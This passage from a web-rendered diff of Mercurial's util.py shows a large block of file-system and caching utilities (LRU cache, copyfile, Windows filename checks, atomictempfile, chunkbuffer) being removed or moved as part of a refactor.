1459 N.prev = E (node.prev = head.prev)
1460 N.next = A (node.next = head)
1461 A.prev = N (head.prev = node)
1462 """
1463 head = self._head
1464 # C.next = D
1465 node.prev.next = node.next
1466 # D.prev = C
1467 node.next.prev = node.prev
1468 # N.prev = E
1469 node.prev = head.prev
1470 # N.next = A
1471 # It is tempting to do just "head" here, however if node is
1472 # adjacent to head, this will do bad things.
1473 node.next = head.prev.next
1474 # E.next = N
1475 node.next.prev = node
1476 # A.prev = N
1477 node.prev.next = node
1478
1479 self._head = node
1480
1481 def _addcapacity(self):
1482 """Add a node to the circular linked list.
1483
1484 The new node is inserted before the head node.
1485 """
1486 head = self._head
1487 node = _lrucachenode()
1488 head.prev.next = node
1489 node.prev = head.prev
1490 node.next = head
1491 head.prev = node
1492 self._size += 1
1493 return node
1494
1495 def _enforcecostlimit(self):
1496 # This should run after an insertion. It should only be called if total
1497 # cost limits are being enforced.
1498 # The most recently inserted node is never evicted.
1499 if len(self) <= 1 or self.totalcost <= self.maxcost:
1500 return
1501
1502 # This is logically equivalent to calling popoldest() until we
1503 # free up enough cost. We don't do that since popoldest() needs
1504 # to walk the linked list and doing this in a loop would be
1505 # quadratic. So we find the first non-empty node and then
1506 # walk nodes until we free up enough capacity.
1507 #
1508 # If we only removed the minimum number of nodes to free enough
1509 # cost at insert time, chances are high that the next insert would
1510 # also require pruning. This would effectively constitute quadratic
1511 # behavior for insert-heavy workloads. To mitigate this, we set a
1512 # target cost that is a percentage of the max cost. This will tend
1513 # to free more nodes when the high water mark is reached, which
1514 # lowers the chances of needing to prune on the subsequent insert.
1515 targetcost = int(self.maxcost * 0.75)
1516
1517 n = self._head.prev
1518 while n.key is _notset:
1519 n = n.prev
1520
1521 while len(self) > 1 and self.totalcost > targetcost:
1522 del self._cache[n.key]
1523 self.totalcost -= n.cost
1524 n.markempty()
1525 n = n.prev
1526
1527 def lrucachefunc(func):
1528 '''cache most recent results of function calls'''
1529 cache = {}
1530 order = collections.deque()
1531 if func.__code__.co_argcount == 1:
1532 def f(arg):
1533 if arg not in cache:
1534 if len(cache) > 20:
1535 del cache[order.popleft()]
1536 cache[arg] = func(arg)
1537 else:
1538 order.remove(arg)
1539 order.append(arg)
1540 return cache[arg]
1541 else:
1542 def f(*args):
1543 if args not in cache:
1544 if len(cache) > 20:
1545 del cache[order.popleft()]
1546 cache[args] = func(*args)
1547 else:
1548 order.remove(args)
1549 order.append(args)
1550 return cache[args]
1551
1552 return f
1553
35
1554 class propertycache(object):
36 class propertycache(object):
1555 def __init__(self, func):
37 def __init__(self, func):
@@ -1564,1657 +46,6 b' class propertycache(object):'
1564 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
46 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1565 obj.__dict__[self.name] = value
47 obj.__dict__[self.name] = value
1566
48
1567 def clearcachedproperty(obj, prop):
1568 '''clear a cached property value, if one has been set'''
1569 prop = pycompat.sysstr(prop)
1570 if prop in obj.__dict__:
1571 del obj.__dict__[prop]
1572
1573 def increasingchunks(source, min=1024, max=65536):
1574 '''return no less than min bytes per chunk while data remains,
1575 doubling min after each chunk until it reaches max'''
1576 def log2(x):
1577 if not x:
1578 return 0
1579 i = 0
1580 while x:
1581 x >>= 1
1582 i += 1
1583 return i - 1
1584
1585 buf = []
1586 blen = 0
1587 for chunk in source:
1588 buf.append(chunk)
1589 blen += len(chunk)
1590 if blen >= min:
1591 if min < max:
1592 min = min << 1
1593 nmin = 1 << log2(blen)
1594 if nmin > min:
1595 min = nmin
1596 if min > max:
1597 min = max
1598 yield ''.join(buf)
1599 blen = 0
1600 buf = []
1601 if buf:
1602 yield ''.join(buf)
1603
1604 def always(fn):
1605 return True
1606
1607 def never(fn):
1608 return False
1609
1610 def nogc(func):
1611 """disable garbage collector
1612
1613 Python's garbage collector triggers a GC each time a certain number of
1614 container objects (the number being defined by gc.get_threshold()) are
1615 allocated even when marked not to be tracked by the collector. Tracking has
1616 no effect on when GCs are triggered, only on what objects the GC looks
1617 into. As a workaround, disable GC while building complex (huge)
1618 containers.
1619
1620 This garbage collector issue have been fixed in 2.7. But it still affect
1621 CPython's performance.
1622 """
1623 def wrapper(*args, **kwargs):
1624 gcenabled = gc.isenabled()
1625 gc.disable()
1626 try:
1627 return func(*args, **kwargs)
1628 finally:
1629 if gcenabled:
1630 gc.enable()
1631 return wrapper
1632
1633 if pycompat.ispypy:
1634 # PyPy runs slower with gc disabled
1635 nogc = lambda x: x
1636
1637 def pathto(root, n1, n2):
1638 '''return the relative path from one place to another.
1639 root should use os.sep to separate directories
1640 n1 should use os.sep to separate directories
1641 n2 should use "/" to separate directories
1642 returns an os.sep-separated path.
1643
1644 If n1 is a relative path, it's assumed it's
1645 relative to root.
1646 n2 should always be relative to root.
1647 '''
1648 if not n1:
1649 return localpath(n2)
1650 if os.path.isabs(n1):
1651 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1652 return os.path.join(root, localpath(n2))
1653 n2 = '/'.join((pconvert(root), n2))
1654 a, b = splitpath(n1), n2.split('/')
1655 a.reverse()
1656 b.reverse()
1657 while a and b and a[-1] == b[-1]:
1658 a.pop()
1659 b.pop()
1660 b.reverse()
1661 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1662
1663 # the location of data files matching the source code
1664 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1665 # executable version (py2exe) doesn't support __file__
1666 datapath = os.path.dirname(pycompat.sysexecutable)
1667 else:
1668 datapath = os.path.dirname(pycompat.fsencode(__file__))
1669
1670 i18n.setdatapath(datapath)
1671
1672 def checksignature(func):
1673 '''wrap a function with code to check for calling errors'''
1674 def check(*args, **kwargs):
1675 try:
1676 return func(*args, **kwargs)
1677 except TypeError:
1678 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1679 raise error.SignatureError
1680 raise
1681
1682 return check
1683
1684 # a whilelist of known filesystems where hardlink works reliably
1685 _hardlinkfswhitelist = {
1686 'apfs',
1687 'btrfs',
1688 'ext2',
1689 'ext3',
1690 'ext4',
1691 'hfs',
1692 'jfs',
1693 'NTFS',
1694 'reiserfs',
1695 'tmpfs',
1696 'ufs',
1697 'xfs',
1698 'zfs',
1699 }
1700
1701 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1702 '''copy a file, preserving mode and optionally other stat info like
1703 atime/mtime
1704
1705 checkambig argument is used with filestat, and is useful only if
1706 destination file is guarded by any lock (e.g. repo.lock or
1707 repo.wlock).
1708
1709 copystat and checkambig should be exclusive.
1710 '''
1711 assert not (copystat and checkambig)
1712 oldstat = None
1713 if os.path.lexists(dest):
1714 if checkambig:
1715 oldstat = checkambig and filestat.frompath(dest)
1716 unlink(dest)
1717 if hardlink:
1718 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1719 # unless we are confident that dest is on a whitelisted filesystem.
1720 try:
1721 fstype = getfstype(os.path.dirname(dest))
1722 except OSError:
1723 fstype = None
1724 if fstype not in _hardlinkfswhitelist:
1725 hardlink = False
1726 if hardlink:
1727 try:
1728 oslink(src, dest)
1729 return
1730 except (IOError, OSError):
1731 pass # fall back to normal copy
1732 if os.path.islink(src):
1733 os.symlink(os.readlink(src), dest)
1734 # copytime is ignored for symlinks, but in general copytime isn't needed
1735 # for them anyway
1736 else:
1737 try:
1738 shutil.copyfile(src, dest)
1739 if copystat:
1740 # copystat also copies mode
1741 shutil.copystat(src, dest)
1742 else:
1743 shutil.copymode(src, dest)
1744 if oldstat and oldstat.stat:
1745 newstat = filestat.frompath(dest)
1746 if newstat.isambig(oldstat):
1747 # stat of copied file is ambiguous to original one
1748 advanced = (
1749 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1750 os.utime(dest, (advanced, advanced))
1751 except shutil.Error as inst:
1752 raise error.Abort(str(inst))
1753
1754 def copyfiles(src, dst, hardlink=None, progress=None):
1755 """Copy a directory tree using hardlinks if possible."""
1756 num = 0
1757
1758 def settopic():
1759 if progress:
1760 progress.topic = _('linking') if hardlink else _('copying')
1761
1762 if os.path.isdir(src):
1763 if hardlink is None:
1764 hardlink = (os.stat(src).st_dev ==
1765 os.stat(os.path.dirname(dst)).st_dev)
1766 settopic()
1767 os.mkdir(dst)
1768 for name, kind in listdir(src):
1769 srcname = os.path.join(src, name)
1770 dstname = os.path.join(dst, name)
1771 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1772 num += n
1773 else:
1774 if hardlink is None:
1775 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1776 os.stat(os.path.dirname(dst)).st_dev)
1777 settopic()
1778
1779 if hardlink:
1780 try:
1781 oslink(src, dst)
1782 except (IOError, OSError):
1783 hardlink = False
1784 shutil.copy(src, dst)
1785 else:
1786 shutil.copy(src, dst)
1787 num += 1
1788 if progress:
1789 progress.increment()
1790
1791 return hardlink, num
1792
1793 _winreservednames = {
1794 'con', 'prn', 'aux', 'nul',
1795 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1796 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1797 }
1798 _winreservedchars = ':*?"<>|'
1799 def checkwinfilename(path):
1800 r'''Check that the base-relative path is a valid filename on Windows.
1801 Returns None if the path is ok, or a UI string describing the problem.
1802
1803 >>> checkwinfilename(b"just/a/normal/path")
1804 >>> checkwinfilename(b"foo/bar/con.xml")
1805 "filename contains 'con', which is reserved on Windows"
1806 >>> checkwinfilename(b"foo/con.xml/bar")
1807 "filename contains 'con', which is reserved on Windows"
1808 >>> checkwinfilename(b"foo/bar/xml.con")
1809 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1810 "filename contains 'AUX', which is reserved on Windows"
1811 >>> checkwinfilename(b"foo/bar/bla:.txt")
1812 "filename contains ':', which is reserved on Windows"
1813 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1814 "filename contains '\\x07', which is invalid on Windows"
1815 >>> checkwinfilename(b"foo/bar/bla ")
1816 "filename ends with ' ', which is not allowed on Windows"
1817 >>> checkwinfilename(b"../bar")
1818 >>> checkwinfilename(b"foo\\")
1819 "filename ends with '\\', which is invalid on Windows"
1820 >>> checkwinfilename(b"foo\\/bar")
1821 "directory name ends with '\\', which is invalid on Windows"
1822 '''
1823 if path.endswith('\\'):
1824 return _("filename ends with '\\', which is invalid on Windows")
1825 if '\\/' in path:
1826 return _("directory name ends with '\\', which is invalid on Windows")
1827 for n in path.replace('\\', '/').split('/'):
1828 if not n:
1829 continue
1830 for c in _filenamebytestr(n):
1831 if c in _winreservedchars:
1832 return _("filename contains '%s', which is reserved "
1833 "on Windows") % c
1834 if ord(c) <= 31:
1835 return _("filename contains '%s', which is invalid "
1836 "on Windows") % stringutil.escapestr(c)
1837 base = n.split('.')[0]
1838 if base and base.lower() in _winreservednames:
1839 return _("filename contains '%s', which is reserved "
1840 "on Windows") % base
1841 t = n[-1:]
1842 if t in '. ' and n not in '..':
1843 return _("filename ends with '%s', which is not allowed "
1844 "on Windows") % t
1845
1846 if pycompat.iswindows:
1847 checkosfilename = checkwinfilename
1848 timer = time.clock
1849 else:
1850 checkosfilename = platform.checkosfilename
1851 timer = time.time
1852
1853 if safehasattr(time, "perf_counter"):
1854 timer = time.perf_counter
1855
1856 def makelock(info, pathname):
1857 """Create a lock file atomically if possible
1858
1859 This may leave a stale lock file if symlink isn't supported and signal
1860 interrupt is enabled.
1861 """
1862 try:
1863 return os.symlink(info, pathname)
1864 except OSError as why:
1865 if why.errno == errno.EEXIST:
1866 raise
1867 except AttributeError: # no symlink in os
1868 pass
1869
1870 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1871 ld = os.open(pathname, flags)
1872 os.write(ld, info)
1873 os.close(ld)
1874
1875 def readlock(pathname):
1876 try:
1877 return readlink(pathname)
1878 except OSError as why:
1879 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1880 raise
1881 except AttributeError: # no symlink in os
1882 pass
1883 with posixfile(pathname, 'rb') as fp:
1884 return fp.read()
1885
1886 def fstat(fp):
1887 '''stat file object that may not have fileno method.'''
1888 try:
1889 return os.fstat(fp.fileno())
1890 except AttributeError:
1891 return os.stat(fp.name)
1892
1893 # File system features
1894
1895 def fscasesensitive(path):
1896 """
1897 Return true if the given path is on a case-sensitive filesystem
1898
1899 Requires a path (like /foo/.hg) ending with a foldable final
1900 directory component.
1901 """
1902 s1 = os.lstat(path)
1903 d, b = os.path.split(path)
1904 b2 = b.upper()
1905 if b == b2:
1906 b2 = b.lower()
1907 if b == b2:
1908 return True # no evidence against case sensitivity
1909 p2 = os.path.join(d, b2)
1910 try:
1911 s2 = os.lstat(p2)
1912 if s2 == s1:
1913 return False
1914 return True
1915 except OSError:
1916 return True
1917
1918 try:
1919 import re2
1920 _re2 = None
1921 except ImportError:
1922 _re2 = False
1923
1924 class _re(object):
1925 def _checkre2(self):
1926 global _re2
1927 try:
1928 # check if match works, see issue3964
1929 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1930 except ImportError:
1931 _re2 = False
1932
1933 def compile(self, pat, flags=0):
1934 '''Compile a regular expression, using re2 if possible
1935
1936 For best performance, use only re2-compatible regexp features. The
1937 only flags from the re module that are re2-compatible are
1938 IGNORECASE and MULTILINE.'''
1939 if _re2 is None:
1940 self._checkre2()
1941 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1942 if flags & remod.IGNORECASE:
1943 pat = '(?i)' + pat
1944 if flags & remod.MULTILINE:
1945 pat = '(?m)' + pat
1946 try:
1947 return re2.compile(pat)
1948 except re2.error:
1949 pass
1950 return remod.compile(pat, flags)
1951
1952 @propertycache
1953 def escape(self):
1954 '''Return the version of escape corresponding to self.compile.
1955
1956 This is imperfect because whether re2 or re is used for a particular
1957 function depends on the flags, etc, but it's the best we can do.
1958 '''
1959 global _re2
1960 if _re2 is None:
1961 self._checkre2()
1962 if _re2:
1963 return re2.escape
1964 else:
1965 return remod.escape
1966
1967 re = _re()
1968
1969 _fspathcache = {}
1970 def fspath(name, root):
1971 '''Get name in the case stored in the filesystem
1972
1973 The name should be relative to root, and be normcase-ed for efficiency.
1974
1975 Note that this function is unnecessary, and should not be
1976 called, for case-sensitive filesystems (simply because it's expensive).
1977
1978 The root should be normcase-ed, too.
1979 '''
1980 def _makefspathcacheentry(dir):
1981 return dict((normcase(n), n) for n in os.listdir(dir))
1982
1983 seps = pycompat.ossep
1984 if pycompat.osaltsep:
1985 seps = seps + pycompat.osaltsep
1986 # Protect backslashes. This gets silly very quickly.
1987 seps.replace('\\','\\\\')
1988 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1989 dir = os.path.normpath(root)
1990 result = []
1991 for part, sep in pattern.findall(name):
1992 if sep:
1993 result.append(sep)
1994 continue
1995
1996 if dir not in _fspathcache:
1997 _fspathcache[dir] = _makefspathcacheentry(dir)
1998 contents = _fspathcache[dir]
1999
2000 found = contents.get(part)
2001 if not found:
2002 # retry "once per directory" per "dirstate.walk" which
2003 # may take place for each patches of "hg qpush", for example
2004 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2005 found = contents.get(part)
2006
2007 result.append(found or part)
2008 dir = os.path.join(dir, part)
2009
2010 return ''.join(result)
2011
2012 def checknlink(testfile):
2013 '''check whether hardlink count reporting works properly'''
2014
2015 # testfile may be open, so we need a separate file for checking to
2016 # work around issue2543 (or testfile may get lost on Samba shares)
2017 f1, f2, fp = None, None, None
2018 try:
2019 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2020 suffix='1~', dir=os.path.dirname(testfile))
2021 os.close(fd)
2022 f2 = '%s2~' % f1[:-2]
2023
2024 oslink(f1, f2)
2025 # nlinks() may behave differently for files on Windows shares if
2026 # the file is open.
2027 fp = posixfile(f2)
2028 return nlinks(f2) > 1
2029 except OSError:
2030 return False
2031 finally:
2032 if fp is not None:
2033 fp.close()
2034 for f in (f1, f2):
2035 try:
2036 if f is not None:
2037 os.unlink(f)
2038 except OSError:
2039 pass
2040
2041 def endswithsep(path):
2042 '''Check path ends with os.sep or os.altsep.'''
2043 return (path.endswith(pycompat.ossep)
2044 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2045
2046 def splitpath(path):
2047 '''Split path by os.sep.
2048 Note that this function does not use os.altsep because this is
2049 an alternative of simple "xxx.split(os.sep)".
2050 It is recommended to use os.path.normpath() before using this
2051 function if need.'''
2052 return path.split(pycompat.ossep)
2053
2054 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2055 """Create a temporary file with the same contents from name
2056
2057 The permission bits are copied from the original file.
2058
2059 If the temporary file is going to be truncated immediately, you
2060 can use emptyok=True as an optimization.
2061
2062 Returns the name of the temporary file.
2063 """
2064 d, fn = os.path.split(name)
2065 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2066 os.close(fd)
2067 # Temporary files are created with mode 0600, which is usually not
2068 # what we want. If the original file already exists, just copy
2069 # its mode. Otherwise, manually obey umask.
2070 copymode(name, temp, createmode, enforcewritable)
2071
2072 if emptyok:
2073 return temp
2074 try:
2075 try:
2076 ifp = posixfile(name, "rb")
2077 except IOError as inst:
2078 if inst.errno == errno.ENOENT:
2079 return temp
2080 if not getattr(inst, 'filename', None):
2081 inst.filename = name
2082 raise
2083 ofp = posixfile(temp, "wb")
2084 for chunk in filechunkiter(ifp):
2085 ofp.write(chunk)
2086 ifp.close()
2087 ofp.close()
2088 except: # re-raises
2089 try:
2090 os.unlink(temp)
2091 except OSError:
2092 pass
2093 raise
2094 return temp
2095
2096 class filestat(object):
2097 """help to exactly detect change of a file
2098
2099 'stat' attribute is result of 'os.stat()' if specified 'path'
2100 exists. Otherwise, it is None. This can avoid preparative
2101 'exists()' examination on client side of this class.
2102 """
2103 def __init__(self, stat):
2104 self.stat = stat
2105
2106 @classmethod
2107 def frompath(cls, path):
2108 try:
2109 stat = os.stat(path)
2110 except OSError as err:
2111 if err.errno != errno.ENOENT:
2112 raise
2113 stat = None
2114 return cls(stat)
2115
2116 @classmethod
2117 def fromfp(cls, fp):
2118 stat = os.fstat(fp.fileno())
2119 return cls(stat)
2120
2121 __hash__ = object.__hash__
2122
2123 def __eq__(self, old):
2124 try:
2125 # if ambiguity between stat of new and old file is
2126 # avoided, comparison of size, ctime and mtime is enough
2127 # to exactly detect change of a file regardless of platform
2128 return (self.stat.st_size == old.stat.st_size and
2129 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2130 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2131 except AttributeError:
2132 pass
2133 try:
2134 return self.stat is None and old.stat is None
2135 except AttributeError:
2136 return False
2137
2138 def isambig(self, old):
2139 """Examine whether new (= self) stat is ambiguous against old one
2140
2141 "S[N]" below means stat of a file at N-th change:
2142
2143 - S[n-1].ctime < S[n].ctime: can detect change of a file
2144 - S[n-1].ctime == S[n].ctime
2145 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2146 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2147 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2148 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2149
2150 Case (*2) above means that a file was changed twice or more at
2151 same time in sec (= S[n-1].ctime), and comparison of timestamp
2152 is ambiguous.
2153
2154 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2155 timestamp is ambiguous".
2156
2157 But advancing mtime only in case (*2) doesn't work as
2158 expected, because naturally advanced S[n].mtime in case (*1)
2159 might be equal to manually advanced S[n-1 or earlier].mtime.
2160
2161 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2162 treated as ambiguous regardless of mtime, to avoid overlooking
2163 by confliction between such mtime.
2164
2165 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2166 S[n].mtime", even if size of a file isn't changed.
2167 """
2168 try:
2169 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2170 except AttributeError:
2171 return False
2172
2173 def avoidambig(self, path, old):
2174 """Change file stat of specified path to avoid ambiguity
2175
2176 'old' should be previous filestat of 'path'.
2177
2178 This skips avoiding ambiguity, if a process doesn't have
2179 appropriate privileges for 'path'. This returns False in this
2180 case.
2181
2182 Otherwise, this returns True, as "ambiguity is avoided".
2183 """
2184 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2185 try:
2186 os.utime(path, (advanced, advanced))
2187 except OSError as inst:
2188 if inst.errno == errno.EPERM:
2189 # utime() on the file created by another user causes EPERM,
2190 # if a process doesn't have appropriate privileges
2191 return False
2192 raise
2193 return True
2194
2195 def __ne__(self, other):
2196 return not self == other
2197
2198 class atomictempfile(object):
2199 '''writable file object that atomically updates a file
2200
2201 All writes will go to a temporary copy of the original file. Call
2202 close() when you are done writing, and atomictempfile will rename
2203 the temporary copy to the original name, making the changes
2204 visible. If the object is destroyed without being closed, all your
2205 writes are discarded.
2206
2207 checkambig argument of constructor is used with filestat, and is
2208 useful only if target file is guarded by any lock (e.g. repo.lock
2209 or repo.wlock).
2210 '''
2211 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2212 self.__name = name # permanent name
2213 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2214 createmode=createmode,
2215 enforcewritable=('w' in mode))
2216
2217 self._fp = posixfile(self._tempname, mode)
2218 self._checkambig = checkambig
2219
2220 # delegated methods
2221 self.read = self._fp.read
2222 self.write = self._fp.write
2223 self.seek = self._fp.seek
2224 self.tell = self._fp.tell
2225 self.fileno = self._fp.fileno
2226
2227 def close(self):
2228 if not self._fp.closed:
2229 self._fp.close()
2230 filename = localpath(self.__name)
2231 oldstat = self._checkambig and filestat.frompath(filename)
2232 if oldstat and oldstat.stat:
2233 rename(self._tempname, filename)
2234 newstat = filestat.frompath(filename)
2235 if newstat.isambig(oldstat):
2236 # stat of changed file is ambiguous to original one
2237 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2238 os.utime(filename, (advanced, advanced))
2239 else:
2240 rename(self._tempname, filename)
2241
2242 def discard(self):
2243 if not self._fp.closed:
2244 try:
2245 os.unlink(self._tempname)
2246 except OSError:
2247 pass
2248 self._fp.close()
2249
2250 def __del__(self):
2251 if safehasattr(self, '_fp'): # constructor actually did something
2252 self.discard()
2253
2254 def __enter__(self):
2255 return self
2256
2257 def __exit__(self, exctype, excvalue, traceback):
2258 if exctype is not None:
2259 self.discard()
2260 else:
2261 self.close()
2262
2263 def unlinkpath(f, ignoremissing=False, rmdir=True):
2264 """unlink and remove the directory if it is empty"""
2265 if ignoremissing:
2266 tryunlink(f)
2267 else:
2268 unlink(f)
2269 if rmdir:
2270 # try removing directories that might now be empty
2271 try:
2272 removedirs(os.path.dirname(f))
2273 except OSError:
2274 pass
2275
2276 def tryunlink(f):
2277 """Attempt to remove a file, ignoring ENOENT errors."""
2278 try:
2279 unlink(f)
2280 except OSError as e:
2281 if e.errno != errno.ENOENT:
2282 raise
2283
2284 def makedirs(name, mode=None, notindexed=False):
2285 """recursive directory creation with parent mode inheritance
2286
2287 Newly created directories are marked as "not to be indexed by
2288 the content indexing service", if ``notindexed`` is specified
2289 for "write" mode access.
2290 """
2291 try:
2292 makedir(name, notindexed)
2293 except OSError as err:
2294 if err.errno == errno.EEXIST:
2295 return
2296 if err.errno != errno.ENOENT or not name:
2297 raise
2298 parent = os.path.dirname(os.path.abspath(name))
2299 if parent == name:
2300 raise
2301 makedirs(parent, mode, notindexed)
2302 try:
2303 makedir(name, notindexed)
2304 except OSError as err:
2305 # Catch EEXIST to handle races
2306 if err.errno == errno.EEXIST:
2307 return
2308 raise
2309 if mode is not None:
2310 os.chmod(name, mode)
2311
2312 def readfile(path):
2313 with open(path, 'rb') as fp:
2314 return fp.read()
2315
2316 def writefile(path, text):
2317 with open(path, 'wb') as fp:
2318 fp.write(text)
2319
2320 def appendfile(path, text):
2321 with open(path, 'ab') as fp:
2322 fp.write(text)
2323
2324 class chunkbuffer(object):
2325 """Allow arbitrary sized chunks of data to be efficiently read from an
2326 iterator over chunks of arbitrary size."""
2327
2328 def __init__(self, in_iter):
2329 """in_iter is the iterator that's iterating over the input chunks."""
2330 def splitbig(chunks):
2331 for chunk in chunks:
2332 if len(chunk) > 2**20:
2333 pos = 0
2334 while pos < len(chunk):
2335 end = pos + 2 ** 18
2336 yield chunk[pos:end]
2337 pos = end
2338 else:
2339 yield chunk
2340 self.iter = splitbig(in_iter)
2341 self._queue = collections.deque()
2342 self._chunkoffset = 0
2343
2344 def read(self, l=None):
2345 """Read L bytes of data from the iterator of chunks of data.
2346 Returns less than L bytes if the iterator runs dry.
2347
2348 If size parameter is omitted, read everything"""
2349 if l is None:
2350 return ''.join(self.iter)
2351
2352 left = l
2353 buf = []
2354 queue = self._queue
2355 while left > 0:
2356 # refill the queue
2357 if not queue:
2358 target = 2**18
2359 for chunk in self.iter:
2360 queue.append(chunk)
2361 target -= len(chunk)
2362 if target <= 0:
2363 break
2364 if not queue:
2365 break
2366
2367 # The easy way to do this would be to queue.popleft(), modify the
2368 # chunk (if necessary), then queue.appendleft(). However, for cases
2369 # where we read partial chunk content, this incurs 2 dequeue
2370 # mutations and creates a new str for the remaining chunk in the
2371 # queue. Our code below avoids this overhead.
2372
2373 chunk = queue[0]
2374 chunkl = len(chunk)
2375 offset = self._chunkoffset
2376
2377 # Use full chunk.
2378 if offset == 0 and left >= chunkl:
2379 left -= chunkl
2380 queue.popleft()
2381 buf.append(chunk)
2382 # self._chunkoffset remains at 0.
2383 continue
2384
2385 chunkremaining = chunkl - offset
2386
2387 # Use all of unconsumed part of chunk.
2388 if left >= chunkremaining:
2389 left -= chunkremaining
2390 queue.popleft()
2391 # offset == 0 is enabled by block above, so this won't merely
2392 # copy via ``chunk[0:]``.
2393 buf.append(chunk[offset:])
2394 self._chunkoffset = 0
2395
2396 # Partial chunk needed.
2397 else:
2398 buf.append(chunk[offset:offset + left])
2399 self._chunkoffset += left
2400 left -= chunkremaining
2401
2402 return ''.join(buf)
2403
2404 def filechunkiter(f, size=131072, limit=None):
2405 """Create a generator that produces the data in the file size
2406 (default 131072) bytes at a time, up to optional limit (default is
2407 to read all data). Chunks may be less than size bytes if the
2408 chunk is the last chunk in the file, or the file is a socket or
2409 some other type of file that sometimes reads less data than is
2410 requested."""
2411 assert size >= 0
2412 assert limit is None or limit >= 0
2413 while True:
2414 if limit is None:
2415 nbytes = size
2416 else:
2417 nbytes = min(limit, size)
2418 s = nbytes and f.read(nbytes)
2419 if not s:
2420 break
2421 if limit:
2422 limit -= len(s)
2423 yield s
2424
2425 class cappedreader(object):
2426 """A file object proxy that allows reading up to N bytes.
2427
2428 Given a source file object, instances of this type allow reading up to
2429 N bytes from that source file object. Attempts to read past the allowed
2430 limit are treated as EOF.
2431
2432 It is assumed that I/O is not performed on the original file object
2433 in addition to I/O that is performed by this instance. If there is,
2434 state tracking will get out of sync and unexpected results will ensue.
2435 """
2436 def __init__(self, fh, limit):
2437 """Allow reading up to <limit> bytes from <fh>."""
2438 self._fh = fh
2439 self._left = limit
2440
2441 def read(self, n=-1):
2442 if not self._left:
2443 return b''
2444
2445 if n < 0:
2446 n = self._left
2447
2448 data = self._fh.read(min(n, self._left))
2449 self._left -= len(data)
2450 assert self._left >= 0
2451
2452 return data
2453
2454 def readinto(self, b):
2455 res = self.read(len(b))
2456 if res is None:
2457 return None
2458
2459 b[0:len(res)] = res
2460 return len(res)
2461
2462 def unitcountfn(*unittable):
2463 '''return a function that renders a readable count of some quantity'''
2464
2465 def go(count):
2466 for multiplier, divisor, format in unittable:
2467 if abs(count) >= divisor * multiplier:
2468 return format % (count / float(divisor))
2469 return unittable[-1][2] % count
2470
2471 return go
2472
2473 def processlinerange(fromline, toline):
2474 """Check that linerange <fromline>:<toline> makes sense and return a
2475 0-based range.
2476
2477 >>> processlinerange(10, 20)
2478 (9, 20)
2479 >>> processlinerange(2, 1)
2480 Traceback (most recent call last):
2481 ...
2482 ParseError: line range must be positive
2483 >>> processlinerange(0, 5)
2484 Traceback (most recent call last):
2485 ...
2486 ParseError: fromline must be strictly positive
2487 """
2488 if toline - fromline < 0:
2489 raise error.ParseError(_("line range must be positive"))
2490 if fromline < 1:
2491 raise error.ParseError(_("fromline must be strictly positive"))
2492 return fromline - 1, toline
2493
2494 bytecount = unitcountfn(
2495 (100, 1 << 30, _('%.0f GB')),
2496 (10, 1 << 30, _('%.1f GB')),
2497 (1, 1 << 30, _('%.2f GB')),
2498 (100, 1 << 20, _('%.0f MB')),
2499 (10, 1 << 20, _('%.1f MB')),
2500 (1, 1 << 20, _('%.2f MB')),
2501 (100, 1 << 10, _('%.0f KB')),
2502 (10, 1 << 10, _('%.1f KB')),
2503 (1, 1 << 10, _('%.2f KB')),
2504 (1, 1, _('%.0f bytes')),
2505 )
2506
2507 class transformingwriter(object):
2508 """Writable file wrapper to transform data by function"""
2509
2510 def __init__(self, fp, encode):
2511 self._fp = fp
2512 self._encode = encode
2513
2514 def close(self):
2515 self._fp.close()
2516
2517 def flush(self):
2518 self._fp.flush()
2519
2520 def write(self, data):
2521 return self._fp.write(self._encode(data))
2522
2523 # Matches a single EOL which can either be a CRLF where repeated CR
2524 # are removed or a LF. We do not care about old Macintosh files, so a
2525 # stray CR is an error.
2526 _eolre = remod.compile(br'\r*\n')
2527
2528 def tolf(s):
2529 return _eolre.sub('\n', s)
2530
2531 def tocrlf(s):
2532 return _eolre.sub('\r\n', s)
2533
2534 def _crlfwriter(fp):
2535 return transformingwriter(fp, tocrlf)
2536
